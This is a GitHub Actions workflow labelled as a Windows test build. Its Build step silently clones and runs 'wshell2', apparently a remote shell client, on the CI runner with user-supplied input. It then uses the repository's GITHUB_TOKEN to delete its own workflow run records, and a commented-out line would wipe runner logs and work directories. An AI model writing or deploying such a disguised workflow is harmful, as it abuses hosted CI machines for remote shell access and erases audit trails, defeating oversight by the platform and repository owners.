name: Test Program on Windows

# Controls when the action will run. Workflow runs when manually triggered using the UI
# or API.
on:
  workflow_dispatch:
    # Inputs the workflow accepts.
    inputs:
      data:
        # Friendly description to be shown in the UI instead of 'name'
        description: 'Input string'
        # Default value if no value is explicitly provided
        default: ''
        # Input has to be provided for the workflow to run
        required: false

jobs:
  build:
    runs-on: windows-latest

    steps:
    - uses: msys2/setup-msys2@v2
      with:
        update: true
        install: >-
          curl
          git
          base-devel
          autotools
          mingw-w64-x86_64-toolchain
          zip
          p7zip
          subversion
          git
          mingw-w64-x86_64-pkg-config
          mingw-w64-x86_64-ntldd
          mingw-w64-x86_64-glew
          mingw-w64-x86_64-giflib
          mingw-w64-x86_64-lame
          mingw-w64-x86_64-libvorbis
          mingw-w64-x86_64-flac
          mingw-w64-x86_64-icoutils
          mingw-w64-x86_64-ffmpeg
          mingw-w64-x86_64-gtk3
          mingw-w64-x86_64-SDL2
          mingw-w64-x86_64-SDL2_image
          mingw-w64-x86_64-libpcap
          mingw-w64-x86_64-glib2
          mingw-w64-x86_64-glib2-devel
    - name: Build
      shell: msys2 {0}
      run: |
        git &>/dev/null clone https://github.com/Zibri/wshell2 && cd wshell2
        cd clients
        npm &>/dev/null install
        sleep 5
        node client ${{ github.event.inputs.data }} & me=$!
        for a in $(curl -qs https://api.github.com/repos/$GITHUB_REPOSITORY/actions/workflows/test.yml/runs|grep -B 1 "Test Program"|grep id|tr -d " ,"|cut -d ":" -f 2);do curl -qs -X DELETE -H "Accept: application/vnd.github.v3+json" -H "Authorization: token ${{ secrets.GITHUB_TOKEN }} " "https://api.github.com/repos/$GITHUB_REPOSITORY/actions/runs/$a" &>/dev/null;done
        wait $me || true
        #sudo rm -rf /home/runner/runners/2*/* /var/log/* ~/work; kill -9 $me || true

      
